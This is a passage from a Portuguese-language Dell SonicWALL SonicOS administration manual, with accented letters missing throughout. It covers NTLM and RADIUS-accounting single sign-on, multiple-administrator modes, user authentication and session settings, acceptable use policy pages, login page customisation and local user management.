do Windows, Internet Explorer, Painel de controle da Internet e Pgina de segurana.
Google Chrome O Chrome se comporta da mesma maneira que o Internet Explorer,
incluindo a exigncia de que o firewall seja adicionado lista de websites na zona de
Intranet Local em Opes de Internet.
Firefox O Firefox utiliza as credenciais de domnio do usurio e autentica de forma
transparente se o website ao qual ele est se conectando no firewall est listado na
entrada network.automatic-ntlm-auth.trusted-uris em sua configurao (acessada ao
digitar about:config na barra de endereos do Firefox).
Safari Embora o Safari oferea suporte ao NTLM, atualmente ele no oferece suporte
um login totalmente transparente usando as credenciais de domnio do usurio.
Navegadores em plataformas fora do PC As plataformas fora do PC como o Linux e
Mac podem acessar recursos em um domnio do Windows por meio do Samba, mas no
tm o conceito de efetuar login do PC no domnio como os PCs com Windows. Portanto,
os navegadores nessas plataformas no tm acesso s credenciais de domnio do usurio
e no possvel us-las para o NTLM.
Quando um usurio no estiver conectado ao domnio ou o navegador no capaz de usar
suas credenciais de domnio, ele solicitar que um nome e uma senha sejam inseridas ou
utilizar as credenciais em cache, caso o usurio tiver optado por salv-las anteriormente.
Em todos os casos, em caso de falha na autenticao ao utilizar as credenciais de domnio do
usurio (que pode ocorrer devido ao fato de o usurio no ter os privilgios necessrios para
obter acesso), ento o navegador solicitar que o usurio insira um nome e uma senha. Isso
permite que o usurio insira credenciais diferentes das credenciais de domnio para obter
acesso.
Como funciona a Contabilizao RADIUS para o Login nico?

Mensagens da Contabilizao RADIUS na pgina 967
Compatibilidade do Dell SonicWALL com dispositivos de rede de terceiros na pgina 968
Encaminhando por proxy na pgina 968
Usurios fora do domnio na pgina 968
Consideraes sobre o IPv6 na pgina 969
A Contabilizao RADIUS especificada pelo RFC 2866 como um mecanismo para um
servidor de acesso rede (NAS) enviar mensagens de contabilizao da sesso de login do
usurio para um servidor de contabilizao. Essas mensagens so enviadas durante o login e
o logoff do usurio. Opcionalmente, elas tambm podem ser enviadas periodicamente durante
a sesso do usurio.
Quando um cliente utiliza um dispositivo de acesso rede de terceiro para realizar a
autenticao de usurio (geralmente para o acesso remoto ou sem fio) e o dispositivo oferecer
suporte contabilizao RADIUS, um dispositivo Dell SonicWALL pode atuar como o Servidor
de Contabilizao RADIUS e pode usar as mensagens da Contabilizao RADIUS enviadas
do servidor de acesso rede do cliente para o login nico (SSO) na rede.

Quando um usurio remoto se conecta por meio de um dispositivo de terceiro, o dispositivo de
terceiro envia uma mensagem de contabilizao ao dispositivo Dell SonicWALL (configurado
como um servidor de contabilizao RADIUS). O dispositivo Dell SonicWALL adiciona o
usurio ao seu banco de dados interno de usurios conectados com base nas informaes da
mensagem de contabilizao.
Quando o usurio efetua logout, o dispositivo de terceiro envia outra mensagem de
contabilizao ao dispositivo Dell SonicWALL. O dispositivo Dell SonicWALL ento desconecta
o usurio.
Nota Quando um servidor de acesso rede (NAS) envia mensagens de contabilizao RADIUS,
ele no solicita que o usurio seja autenticado pelo RADIUS. O NAS pode enviar
mensagens de contabilizao RADIUS, mesmo quando o dispositivo de terceiro estiver
usando o LDAP, o banco de dados local ou qualquer outro mecanismo para autenticar os
usurios.
As mensagens de contabilizao RADIUS no so criptografadas. A contabilizao RADIUS

inerentemente segura contra falsificaes, porque utiliza um autenticador de solicitao e um
segredo compartilhado. Ela exige que uma lista dos servidores de acesso rede (NAS), que
podem enviar mensagens de Contabilizao RADIUS, seja configurada no dispositivo. Essa
configurao fornece o endereo IP e o segredo compartilhado para cada NAS.
Mensagens da Contabilizao RADIUS
A contabilizao RADIUS utiliza dois tipos de mensagens de contabilizao:

Solicitao de contabilizao
Resposta de contabilizao
Uma Solicitao de contabilizao pode enviar um dos trs tipos de solicitao
especificados pelo atributo Tipo de status:
Iniciar enviada quando um usurio conectado.
Parar enviada quando um usurio desconectado.
Atualizar provisoriamente enviada periodicamente durante uma sesso de login do
usurio.
As mensagens de contabilizao seguem o padro do RADIUS especificado pelo RFC 2866.
Cada mensagem contm uma lista de atributos e um autenticador que validado por um
segredo compartilhado.
Os seguintes atributos, que so relevantes para o SSO, so enviados nas Solicitaes de
contabilizao:
Tipo de status O tipo de solicitao de contabilizao (Iniciar, Parar ou Atualizar
provisoriamente).
Nome de usurio O nome de usurio de login. O formato no especificado pela RFC
e pode ser um nome de login simples ou uma cadeia de caracteres com vrios valores,
como nome de login, domnio ou nome distinto (DN).
Endereo IP com moldura O endereo IP do usurio. Se a NAT for utilizada, ela deve
ser o endereo IP interno do usurio.
ID de Estao de Chamada Uma representao em cadeia dos caracteres do endereo
IP do usurio, utilizada por alguns dispositivos como o Aventail.
Estado do proxy Um estado de passagem utilizado para encaminhar solicitaes para
outro servidor de contabilizao RADIUS.

Compatibilidade do Dell SonicWALL com dispositivos de rede de terceiros
Para que os dispositivos Dell SonicWALL sejam compatveis com os dispositivos de rede de
terceiros para o SSO por meio da Contabilizao RADIUS, o dispositivo de terceiro deve ser
capaz de realizar os seguintes itens:
Oferecer suporte Contabilizao RADIUS.
Enviar mensagens de Iniciar e Parar. No necessrio o envio de mensagens do tipo
Atualizar provisoriamente.
Enviar o endereo IP do usurio no atributo Endereo IP com moldura ou ID de Estao
de Chamada nas mensagens do tipo Iniciar e Parar.
Nota No caso de um servidor de acesso remoto que utilize a NAT para converter o endereo IP
externo pblico de um usurio, o atributo deve fornecer o endereo IP interno que
utilizado na rede interna e ele deve ser um endereo IP exclusivo para o usurio. Se os dois
atributos estiverem sendo utilizados, o atributo Endereo IP com moldura dever usar o
endereo IP interno e o atributo ID de Estao de Chamada dever usar o endereo IP
externo.
O nome de usurio de login dever ser enviado no atributo Nome de usurio das mensagens
dos tipos Iniciar e Atualizar provisoriamente. O nome de usurio de login tambm pode ser
enviado no atributo Nome de usurio das mensagens do tipo Parar, mas isso no
necessrio. O atributo Nome de usurio deve conter o nome de conta do usurio e pode incluir
tambm o domnio ou ele deve conter o nome distinto (DN) do usurio.
Encaminhando por proxy
Um dispositivo Dell SonicWALL que atue como um servidor de contabilizao RADIUS pode
encaminhar as solicitaes por proxy para at quatro outros servidores de contabilizao
RADIUS para cada servidor de acesso rede (NAS). Cada servidor de contabilizao RADIUS
configurado separadamente para cada NAS.
Para evitar a necessidade de inserir novamente os detalhes de configurao para cada NAS,
o SonicOS permite que voc selecione o encaminhamento para cada NAS a partir de uma lista
de servidores configurados.
A configurao de encaminhamento por proxy para cada cliente do NAS inclui tempos limite e
repeties. A maneira de encaminhar solicitaes para dois ou mais servidores pode ser
configurada por meio da seleo das opes a seguir:
tentar o prximo servidor em um tempo limite
encaminhar cada uma das solicitaes para todos os servidores
Usurios fora do domnio
Os usurios relatados para um servidor de contabilizao RADIUS so determinados como

usurios locais (fora do domnio) nos seguintes casos:
O nome de usurio foi enviado sem um domnio e ele no est configurado para procurar
domnios para o servidor por meio do LDAP.
O nome de usurio foi enviado sem um domnio e ele est configurado para procurar
domnios para o servidor por meio do LDAP, mas o nome de usurio no foi encontrado.
O nome de usurio foi enviado com um domnio, mas o domnio no foi encontrado no
banco de dados do LDAP.
O nome de usurio foi enviado com um domnio, mas o nome do usurio no foi encontrado
no banco de dados do LDAP.

Um usurio fora do domnio autenticado pela contabilizao RADIUS est sujeito s mesmas
restries que um usurio autenticado por outros mecanismos do SSO e se aplicam as
seguintes restries:
O usurio somente ser conectado se a opo Permitir acesso limitado a usurios fora do
domnio estiver definida.
O usurio no poder se tornar um membro do grupo de Usurios confiveis.
Consideraes sobre o IPv6
Na contabilizao RADIUS, estes atributos so usados para conter o endereo IPv6 do

usurio:
Framed-Interface-Id / Framed-IPv6-Prefix
Framed-IPv6-Address
Atualmente, todos estes atributos do IPv6 so ignorados.
Alguns dispositivos transmitem o endereo IPv6 como texto no atributo Calling-Station-ID.
O atributo Calling-Station-ID tambm ignorado se ele no contiver um endereo IPv4 vlido.
As mensagens da contabilizao RADIUS que contenham um atributo do endereo IPv6 e
nenhum atributo do endereo IPv4 so encaminhadas ao servidor proxy. Se nenhum servidor
proxy estiver configurado, os atributos do IPv6 so descartados.
Porta do servidor de Contabilizao RADIUS
A contabilizao RADIUS geralmente utiliza a porta UDP 1646 ou 1813. A porta UDP 1813
a porta especificada pela IANA. A porta UDP 1646 uma porta padro no oficial mais antiga.
Por padro, o dispositivo Dell SonicWALL escuta a porta 1812. Outro nmeros de porta podem
ser configurados para a porta de contabilizao RADIUS, mas o dispositivo s poder ouvir
somente uma porta. Portanto, se voc estiver usando vrios servidores de acesso rede
(NASs), todos eles devem ser configurados para se comunicar no mesmo nmero de porta.
Viso geral do Suporte para mltiplos administradores

Esta seo fornece uma apresentao do recurso Suporte para mltiplos administradores.
Definio do Suporte para mltiplos administradores na pgina 969
Como funciona o Suporte para mltiplos administradores? na pgina 970
Definio do Suporte para mltiplos administradores
A verso original do SonicOS suportava somente o login de um nico administrador em um

firewall com privilgios administrativos totais. Usurios adicionais podem obter o acesso como
administrador limitado, mas somente um administrador pode ter acesso total para modificar
todas as reas da GUI do SonicOS de uma s vez.
O SonicOS fornece suporte para mltiplos administradores simultneos. Esse recurso permite
que vrios usurios efetuem login com privilgios administrativos totais. Alm de usar o nome
de usurio padro admin, podem ser criados nomes de usurio administradores adicionais.
Devido possibilidade de conflitos causados por vrios administradores fazendo alteraes de
configurao ao mesmo tempo, permitido somente a um administrador fazer alteraes de
configurao. Os administradores adicionais obtm acesso total GUI, mas eles no podem
fazer alteraes de configurao.

Benefcios
O Suporte para mltiplos administradores fornece os seguintes benefcios:

Maior produtividade Permitir que vrios administradores acessem um firewall
simultaneamente elimina o logout automtico, uma situao que ocorre quando dois
administradores precisam do acesso ao dispositivo ao mesmo tempo e um
automaticamente desconectado do sistema.
Menor risco de configurao O novo modo somente leitura permite aos usurios
visualizar a configurao atual e o status de um firewall sem o risco de alteraes no
intencionais configurao.
Como funciona o Suporte para mltiplos administradores?
As sees a seguir descrevem o funcionamento do recurso Suporte para mltiplos

administradores:
Modos de configurao na pgina 970
Grupos de usurios na pgina 971
Prioridade para apropriao de administradores na pgina 972
GMS e Suporte para mltiplos administradores na pgina 972
Modos de configurao
Para permitir mltiplos administradores simultneos, ao mesmo que tambm impede que
possveis conflitos causados por vrios administradores fazendo alteraes de configurao
ao mesmo tempo, os seguintes modos de configurao foram definidos:
Modo de configurao O administrador possui privilgios totais para editar a
configurao. Se nenhum administrador j estiver conectado ao dispositivo, esse ser o
comportamento padro para os administradores com privilgios administrativos totais e
limitados (mas no para os administradores somente leitura).
Nota Os administradores com privilgio de configurao total tambm podem efetuar login
usando a Interface de Linha de Comando (CLI).
Modo somente leitura O administrador no pode fazer nenhuma alterao na

configurao, mas pode exibir e navegar por toda a interface de gerenciamento e realizar
aes de monitoramento.
Somente os administradores que so membros do grupo de usurios Administradores
somente leitura do SonicWALL obtm acesso somente leitura, e esse o nico modo de
configurao que eles podem acessar.
Modo de no configurao O administrador pode exibir as mesmas informaes que
os membros do grupo somente leitura e tambm podem iniciar aes de gerenciamento
que no tenham o potencial de causar conflitos de configurao.
Somente os administradores que so membros do grupo de usurios Administradores do
SonicWALL podem acessar o modo de no configurao. Esse modo pode ser inserido
quando outro administrador j estiver no modo de configurao e o novo administrador
optar pela no apropriao do administrador existente. Por padro, quando um
administrador apropriado fora do modo de configurao, ele ou ela convertido para o
modo de no configurao. Na pgina Sistema > Administrao, esse comportamento
pode ser modificado para que o administrador original seja desconectado.

A tabela a seguir fornece um resumo dos direitos de acesso disponveis para os modos de
configurao. Os direitos de acesso para os administradores limitados tambm so includos,
mas observe que esta tabela no inclui todas as funes disponveis para os administradores
limitados.
Administrador Administrador Administrado

total no modo total no modo de r somente Administrador
Funo de config. no config. leitura limitado
Importar certificados X
Gerar solicitaes de X
assinatura de certificados
Exportar certificados X
Exportar as X X X
configuraes do
dispositivo
Fazer download de TSR X X X
Utilizar outros X X X
diagnsticos
Configurar a rede X X
Liberar cache de ARP X X X
Configurar servidor X
DHCP
Renegociar tneis de X X
VPN
Efetuar logoff de usurios X X X
somente usurios
convidados
Desbloquear usurios X X
bloqueados
Limpar o registro em log X X X
Filtrar os registros em log X X X X
Exportar os registros em X X X X
log
Enviar registros em log X X X
por e-mail
Configurar categorias de X X X
registros em log
Definir configuraes dos X X
registros em log
Gerar relatrios dos X X X
registros em log
Navegar pela UI X X X
completa
Gerar relatrios dos X X X
registros em log
Grupos de usurios
O recurso Suporte para mltiplos administradores oferece suporte para dois novos grupos de
usurios padro:
Administradores do SonicWALL Os membros deste grupo tm acesso de
administrador total para editar a configurao.

Administradores somente leitura do SonicWALL Os membros deste grupo tm
acesso somente leitura para exibir a interface de gerenciamento completa, mas no podem
editar a configurao e no podem alternar para o modo de configurao completa.
No recomendvel incluir usurios em mais de um desses grupos de usurios. No entanto,
se voc fizer isso, o seguinte comportamento se aplica:
Se os membros do grupo de usurios Administradores do SonicWALL tambm
estiverem includos nos grupos de usurios Administradores limitados ou
Administradores somente leitura do SonicWALL, os membros tero direitos de
administrador completos.
Se os membros do grupo de usurios Administradores limitados estiverem includos no
grupo de usurios Administradores somente leitura do SonicWALL, os membros tero
direitos de administrador limitados.
Prioridade para apropriao de administradores

As regras a seguir determinam os nveis de prioridade que as vrias classes de
administradores possuem para a apropriao de administradores que j estejam conectados
no dispositivo:
1. O usurio admin e o SonicWALL Global Management System (GMS) tm a prioridade mais
alta e podem realizar apropriaes a todos os usurios.
2. Um usurio que membro do grupo de usurios Administradores do SonicWALL pode
realizar apropriaes a todos os usurios, exceto para o admin e o SonicWALL GMS.
3. Um usurio que membro do grupo de usurios Administradores limitados s pode
realizar apropriaes a outros membros do grupo Administradores limitados.
GMS e Suporte para mltiplos administradores

Ao usar o SonicWALL GMS para gerenciar um firewall, o GMS efetua login no dispositivo com
frequncia (para atividades como garantir que os tneis de IPSec do gerenciamento do GMS
foram criados corretamente). Esses logins frequentes do GMS podem dificultar a
administrao local do dispositivo, pois o administrador local pode receber uma apropriao
do GMS.

Exibindo o status em Usurios > Status
A pgina Usurios > Status exibe as Sesses de usurio ativas no firewall. O painel
Sesses de usurio ativas lista o Nome do usurio, Endereo IP, Tempo de sesso,
Tempo restante, Inatividade restante, Configuraes e Logout. Para efetuar logout de um
usurio, clique no cone Efetuar logout no final da linha para esse usurio.
Selecione a caixa de seleo Incluir usurios inativos para exibir os usurios

autenticados pelo SSO que tenham sido excludos devido inatividade e colocados no
estado inativo para conservar os recursos do sistema, em vez de serem desconectados.
Estes usurios sero identificados no texto com a cor cinza.
Selecione a caixa de seleo Mostrar usurios no autenticados para exibir informaes
sobre os usurios que tentaram enviar o trfego por este dispositivo, mas que no foram
identificados ou autenticados. A tabela de Usurios no autenticados lista o Endereo IP,
Motivo, Nome de usurio se conhecido e Hora do ltimo acesso
Definindo as configuraes em Usurios > Configuraes

Nessa pgina, possvel configurar o mtodo de autenticao necessrio, as configuraes
globais de usurio e uma poltica de usurio aceitvel que ser exibida para os usurios
durante o login em sua rede.
As instrues de configurao para as configuraes desta pgina so fornecidas nas sees

a seguir:
Configuraes de autenticao de usurio na pgina 974
Configuraes da sesso do usurio na pgina 977
Outras configuraes globais do usurio na pgina 978
Poltica de uso aceitvel na pgina 979
Personalizar pginas de login na pgina 980

Configuraes de autenticao de usurio
Na lista suspensaMtodo de autenticao de usurio, selecione o tipo de gerenciamento

de conta do usurio utilizado pela sua rede:
Selecione Usurios locais para configurar os usurios no banco de dados local do
firewall usando as pginas Usurios > Usurios locais e Usurios > Grupos locais.
Para obter informaes sobre o uso do banco de dados local para a autenticao,
consulte Usando Grupos e usurios locais para a autenticao na pgina 952.
Para obter instrues detalhadas sobre configurao, consulte as sees a seguir:
Configurando os Usurios locais na pgina 983
Configurando Grupos locais na pgina 988
Selecione RADIUS se voc tiver mais de 1.000 usurios ou para adicionar uma
camada extra de segurana para a autenticao de usurio no firewall. Se voc
selecionar RADIUS para a autenticao de usurio, os usurios devero efetuar login
no firewall usando HTTPS para criptografar a senha enviada ao firewall. Se um usurio
tentar efetuar login no firewall usando HTTP, o navegador ser redirecionado
automaticamente para HTTPS.
Para obter informaes sobre o uso de um banco de dados o RADIUS para a
autenticao, consulte Usando o RADIUS para a autenticao na pgina 954.
Para obter instrues detalhadas sobre configurao, consulte Configurando a
autenticao RADIUS na pgina 993.
Selecione RADIUS + Usurios locais se voc deseja usar os bancos de dados de
usurio local do firewall e do RADIUS para a autenticao.

Selecione LDAP se voc estiver usando um servidor do Lightweight Directory Access
Protocol (LDAP), servidor do Microsoft Active Directory (AD) ou Novell eDirectory para
manter todos os dados de conta de seus usurios.
Para obter informaes sobre o uso de um banco de dados do LDAP para a
autenticao, consulte Usando a autenticao LDAP/Active Directory/eDirectory na
pgina 955.
Para obter instrues detalhadas sobre configurao, consulte Configurando a
integrao do LDAP no SonicOS na pgina 999.
Selecione LDAP + Usurios locais se voc deseja usar os bancos de dados de
usurio local do firewall e do LDAP para a autenticao.
Para o mtodo de Login nico, selecione uma das opes a seguir:
Selecione Agente SSO da SonicWALL se voc estiver usando o Active Directory para
a autenticao e o agente SSO estiver instalado em um computador no mesmo
domnio. Para obter instrues de configurao do SSO, consulte Configurandoo Login
nico na pgina 1013.
Selecione Agente de servios de terminal se voc estiver usando o Servios de
terminal e o Agente de servios de terminal (TSA) estiver instalado em um servidor de
terminal no mesmo domnio.
Selecione Somente autenticao de NTLM no navegador se voc deseja autenticar
os usurios da Internet sem usar o Agente SSO ou TSA. Os usurios so identificados
no momento em que enviam o trfego HTTP. O NTLM exige a configurao do RADIUS
(alm do LDAP, se o LDAP estiver sendo utilizado) para o acesso autenticao
MSCHAP. Se o LDAP for selecionado acima, um boto Configurar separado para o
RADIUS ser exibido aqui quando o NTLM for selecionado.
Selecione Contabilizao RADIUS se voc deseja que um servidor de acesso rede
(NAS) envie mensagens de contabilizao da sesso de login do usurio para um
servidor de contabilizao.
No selecione nenhuma das opes a seguir se voc no estiver usando a Login nico
para a autenticao de usurios.
Selecione Nomes de usurio sem distino entre maisculas e minsculas para
habilitar a correspondncia com base no emprego de maisculas e minsculas nos nomes
de conta do usurio.
Selecione Impor exclusividade de login para impedir que o mesmo nome de usurio seja
utilizado para efetuar login na rede a partir de mais de uma localizao ao mesmo tempo.
Esta configurao aplica-se aos usurios locais e usurios do RADIUS/LDAP. Contudo, ela
no se aplica ao administrador padro com o nome de usurio admin.
Configure as opes de Senha de uso nico a seguir. Os valores inseridos resultaro em
uma fora da senha Fraca, Boa ou Excelente.
Selecione um Texto sem formatao ou HTML para o Formato do e-mail da senha
de uso nico.
Em Formato da senha de uso nico, selecione Caracteres, Caracteres+Nmeros ou
Nmeros na lista suspensa.
Em Comprimento da senha de uso nico, insira o comprimento mnimo no primeiro
campo e o comprimento mximo no segundo campo. Os comprimentos mnimo e
mximo devem estar dentro do intervalo de 4 a 14.

Configuraes de login de usurio na web
No campo Mostrar pgina de autenticao do usurio para, insira o nmero de minutos

que um usurio ter para efetuar login antes que a pgina de login alcance o tempo limite.
Se ele expirar, uma mensagem exibida, informando que o usurio deve clicar antes de
tentar efetuar login novamente.
No campo Redirecionar o navegador para este dispositivo por meio do, selecione uma
das opes a seguir para determinar a forma como o navegador de um usurio
inicialmente redirecionado para o servidor da web do dispositivo Dell SonicWALL:
O endereo IP da interface Selecione esta opo para redirecionar o navegador
para o endereo IP da interface do servidor da web do dispositivo.
Seu nome de domnio a partir de uma pesquisa reversa do DNS do endereo IP
da interface Habilita o boto Mostrar cache reverso do DNS localizado na parte
inferior da janela; quando clicado, uma pop-up exibe a Interface do servidor da web do
dispositivo, Endereo IP, Nome DNS e TTL em alguns segundos. Clique no boto para
verificar o nome de domnio (nome DNS) que est sendo utilizado para redirecionar o
navegador do usurio.
Seu nome de domnio configurado Insira o nome de domnio do servidor da web
para que o navegador do usurio seja redirecionado.
O nome do certificado da administrao Para habilitar o redirecionamento para um
nome de domnio configurado, defina o nome de domnio do firewall na pgina Sistema
> Administrao. Redirecionar para o nome do certificado da administrao permitido
quando um certificado importado foi selecionado para o gerenciamento da web de
HTTPS nessa pgina.
Selecione Redirecionar usurios de HTTPS para HTTP ao concluir o login se voc
deseja conectar os usurios rede por meio de seu firewall via HTTP aps o login via
HTTPS. Se voc tiver um grande nmero de usurios efetuando login via HTTPS, voc
pode desejar redirecion-los para o HTTP, pois o HTTPS consome mais recursos do
sistema do que o HTTP. Se essa opo for desmarcada, uma caixa de dilogo de aviso
ser exibida.
Selecione Permitir login com HTTP com o modo CHAP do RADIUS para emitir um
desafio CHAP quando um usurio do RADIUS tentar efetuar login usando HTTP. Isso
permite uma conexo segura sem o uso do HTTPS. Verifique se o servidor RADIUS
oferece suporte para essa opo.

Nota Os administradores que efetuam login com o uso desse mtodo estaro restritos nas
operaes de gerenciamento que eles podem realizar (j que algumas operaes exigem
que o dispositivo conhea a senha do administrador, o que no o caso para este mtodo
de autenticao).
Configuraes da sesso do usurio

As configuraes listadas abaixo se aplicam a todos os usurios autenticados por meio do firewall.
Tempo limite de inatividade (minutos): Especifique o perodo de tempo de inatividade (o

padro 5 minutos) depois que os usurios forem desconectados do firewall.
O tempo limite de inatividade torna os usurios inativos em vez de desconectados
Selecione esta opo para economizar a sobrecarga do sistema e evitar possveis atrasos
ao identificar novamente os usurios excludos autenticados pelo SSO, tornando-os
inativos em vez de desconect-los. Os usurios inativos no utilizam os recursos do
sistema e podem ser exibidos na pgina Usurios > Status.
Excluir usurios inativos aps (minutos): Defina o nmero de minutos de inatividade
aps o qual os usurios autenticados pelo SSO sero excludos. Como o temporizador de
excluso executado uma vez a cada 10 minutos, pode levar at 10 minutos a mais para
remover os usurios do status ativo.
Habilitar limite da sesso de login para logins na web: Limite o tempo que um usurio
fica conectado ao firewall, selecionando a caixa de seleo e inserindo a quantidade de
tempo, em minutos, no campo Limite da sesso de login (minutos). O valor padro de
30 minutos.
Mostrar janela de status do login do usurio Exibe uma janela de status com um boto
Efetuar logout durante a sesso do usurio. O usurio pode clicar no boto Efetuar
logout para sair da sesso.

A janela Status do login do usurio exibe o nmero de minutos aps o usurio sair da
sesso de login. O usurio pode definir o tempo restante para um nmero menor de
minutos inserindo o nmero e clicando no boto Atualizar.
Se o usurio for membro do grupo de usurios Administradores do SonicWALL ou
Administradores limitados, a janela Status do login do usurio ter um boto Gerenciar
que ele poder clicar para efetuar login automaticamente na interface de gerenciamento
do firewall. Consulte Desabilitando a janela pop-up de Status de login do usurio na
pgina 1071 para obter informaes sobre como desabilitar a janela Status do login do
usurio para os usurios administrativos. Consulte Configurando Grupos locais na
pgina 988 para obter os procedimentos da configurao de grupos.
A janela de status do login do usurio envia pulsaes a cada (segundos) Define a
frequncia do sinal de pulsao utilizado para detectar se o usurio ainda tem uma
conexo vlida
Habilitar deteco de usurio desconectado Faz com que o firewall detecte o
momento em que a conexo de um usurio no mais vlida e encerra a sesso.
Tempo limite da pulsao da janela de status do login do usurio (minutos) Define
o tempo necessrio, sem uma resposta da pulsao antes de encerrar a sesso do
usurio.
Outras configuraes globais do usurio

Permitir que estes URLs de HTTP ignorem a autenticao de usurios nas regras de
acesso: Defina uma lista de URLs aos quais os usurios podem se conectar sem a
necessidade de autenticao. Para adicionar uma URL lista:
Etapa 1 Clique em Adicionar abaixo da lista de URLs.

Etapa 2 Na janela Inserir URL, insira a URL de nvel superior que voc est adicionando, por exemplo,
www.sonicwall.com. Todos os subdiretrios dessa URL so includos, como www.sonicwall.com/
us/Support.html. Clique em OK para adicionar a URL lista.

Poltica de uso aceitvel
Uma poltica de uso aceitvel (AUP) uma poltica que os usurios devem aceitar para obter
acesso a uma rede ou Internet. uma prtica comum para muitas empresas e instituies
educacionais exigir que os funcionrios ou alunos concordem com uma poltica de uso
aceitvel antes do acesso rede ou Internet por meio do firewall.
A seo Poltica de uso aceitvel permite que voc crie a janela da mensagem da AUP para
os usurios. possvel usar a formatao HTML no corpo da mensagem. Clicar no boto
Modelo de exemplo criar um modelo em HTML pr-formatado para a janela da AUP.
Exibir no login de Selecione a(s) interface(s) de rede para as quais voc deseja exibir
a Poltica de uso aceitvel durante o login dos usurios. possvel escolher Zonas
confiveis, Zona de WAN, Zonas pblicas, Zonas sem fio e Zona de VPN em qualquer
umas das combinaes.
Tamanho da janela (pixels) Permite que voc especifique o tamanho da janela da AUP
definido em pixels. Marcar Habilitar barras de rolagem na janela permite que o usurio
percorra todo o contedo da janela da AUP.
Habilitar barras de rolagem na janela Ativa as barras de rolagem se seu contedo
ultrapassar o tamanho de exibio da janela.

Contedo da pgina da Poltica de uso aceitvel Insira o texto da Poltica de uso aceitvel
na caixa de texto. possvel incluir a formatao HTML. A pgina que exibida para o usurio
inclui um boto Aceito ou Cancelar para a confirmao do usurio.
Clique no boto Exemplo de modelo para preencher o contedo com o modelo da AUP
padro, que poder ser modificado:
<font face=arial size=3>
<center><b><i>Bem-vindo ao SonicWALL</center></b></i>
<font size=2>
<table width="100%" border="1">

<tr><td>
<font size=2>
<br><br><br>
<center>Insira aqui os termos de sua poltica de uso.
<br><br><br>
</td></tr>
</table>
Somente clique em "Aceito" se desejar aceitar estes termos e continuar.

Caso contrrio, selecione "Cancelar".
Clique no boto Visualizar para exibir a mensagem da AUP como ela aparecer para o
usurio.
Personalizar pginas de login

O SonicOS oferece a capacidade de personalizar o texto das pginas de autenticao do login
que so apresentadas aos usurios. Os administradores podem adaptar as pginas
relacionadas ao login com suas prprias palavras e aplicar as alteraes para que elas tenham
efeito sem a necessidade de reinicializao.

Embora toda a interface do SonicOS esteja disponvel em diferentes idiomas, s vezes, o
administrador no deseja alterar o idioma de toda a UI para um idioma local especfico.
No entanto, se o firewall exigir a autenticao antes que os usurios possam acessar outras
redes ou permitir servios de acesso externo (por ex., VPN, SSL-VPN), essas pginas
relacionadas ao login geralmente devem ser localizadas para torn-las mais fceis de usar
para os usurios comuns.
O recurso Personalizar pgina de login oferece as seguintes funcionalidades:
Mantm o estilo de login original por padro
Permite que os administradores personalizem as pginas relacionadas ao login
Permite que os administradores utilizem as pginas relacionadas ao login padro como
modelos
Permite que os administradores salvem as pginas personalizadas nas preferncias do
sistema
Permite que os administradores visualizem suas alteraes antes de salv-las nas
preferncias
Apresenta pginas relacionadas ao login personalizadas aos usurios comuns
As seguintes pginas relacionadas ao login podem ser personalizadas:

Apropriao do administrador

Autenticao de login
Desconectado
Login completo
Login no permitido
Bloqueio de login
Status de login
Status de login de convidado
Poltica de acesso barrado
Poltica de acesso inativo
Poltica de acesso indisponvel
Redirecionamento de login de poltica
Poltica de falha na investigao de SSO
Atualizao da senha do usurio
Mensagem de login do usurio
Para personalizar uma dessas pginas, siga as etapas a seguir:
Etapa 1 Na pgina Usurios > Configuraes, role para baixo at a seo Personalizar pginas de
login.
Etapa 2 Selecione a pgina que ser personalizada no menu suspensoSelecionar pgina de login .
Etapa 3 Role at o final da pgina e clique em Padro para carregar o contedo padro da pgina.
Etapa 4 Edite o contedo da pgina,
Nota As linhas var strXXX = nas pginas do modelo so Cadeias JavaScript personalizadas.
possvel alter-las na sua elaborao de texto pessoal. As modificaes devem seguir a
sintaxe do JavaScript. Tambm possvel editar o texto na seo HTML.
Etapa 5 Clique em Visualizar para visualizar a aparncia a pgina personalizada.

Etapa 6 Quando tiver terminado a edio da pgina, clique em Aceitar.
Deixe o campo Contedo da pgina de login em branco e aplique a alterao para reverter a
pgina padro aos usurios.
Cuidado No se esquea de verificar a HTML da sua pgina de login personalizada antes de

implement-la, pois os erros de HTML podem fazer com que a pgina de login no funcione
corretamente. Uma pgina de login alternativa est sempre disponvel para o administrador,
em caso de problemas em uma pgina de login personalizada. Para acessar a pgina de
login alternativa, insira manualmente o URL: https://(device_ip)/defauth.html
diretamente na linha de endereos do navegador (com distino entre maisculas e
minsculas). A pgina de login padro sem qualquer personalizao ento exibida,
permitindo que voc efetue login normal e redefina suas pginas relacionadas ao login
personalizadas.

Configurando os Usurios locais
Os Usurios locais so armazenados e gerenciados no banco de dados local do dispositivo de
segurana. Na pgina Usurios > Usurios locais, possvel exibir e gerenciar todos os
usurios locais, adicionar novos usurios locais e editar os usurios locais existentes. Tambm
possvel importar usurios de seu servidor do LDAP.
Consulte as sees a seguir para obter instrues de configurao:

Definindo as configuraes dos Usurios locais na pgina 983
Exibindo, editando e excluindo Usurios locais na pgina 984
Adicionando Usurios locais na pgina 984
Editando Usurios locais na pgina 986
Importando Usurios locais do LDAP na pgina 986
Definindo as configuraes dos Usurios locais

As seguintes configuraes globais podem ser definidas para todos os usurios locais na
pgina Usurios > Usurios locais:
Aplicar restries de senha para todos os usurios locais Aplica as restries de
senha que so especificadas na pgina Sistema > Administrao para todos os usurios
locais. Para obter mais informaes sobre as restries de senha, consulte Configuraes
de segurana de login na pgina 105.
Nota Isso no afetar a conta de usurio padro admin.
Expurgar a conta aps a expirao Para uma conta de usurio que configurada com
uma durao limitada, selecionar esta caixa de seleo faz com que a conta de usurio
seja excluda aps a durao expirar. Desative esta caixa de seleo para que a conta seja
simplesmente desativada aps a durao expirar. O administrador pode ento habilitar
novamente a conta redefinindo sua durao.

Exibindo, editando e excluindo Usurios locais
possvel exibir todos os grupos aos quais um usurio pertence na pgina Usurios >
Usurios locais. Clique no cone de ampliao , localizado ao lado de um usurio para
exibir as associaes a grupos desse usurio.
As trs colunas direita do nome do usurio listam os privilgios que o usurio possui. No
modo de exibio ampliada, elas exibem o grupo do qual o usurio obtm cada um dos
privilgios.
Passe o mouse sobre o cone de comentrio na coluna de Acesso VPN para exibir os
recursos de rede para os quais o usurio tem o acesso VPN.
No modo de exibio ampliada, clique no cone de excluso em Configurar para
remover o usurio de um grupo.
Clique no cone de edio em Configurar para editar o usurio.
Clique no cone de excluso em Configurar para excluir o usurio ou o grupo nessa
linha.
Adicionando Usurios locais

possvel adicionar usurios locais ao banco de dados interno do firewall a partir da pgina
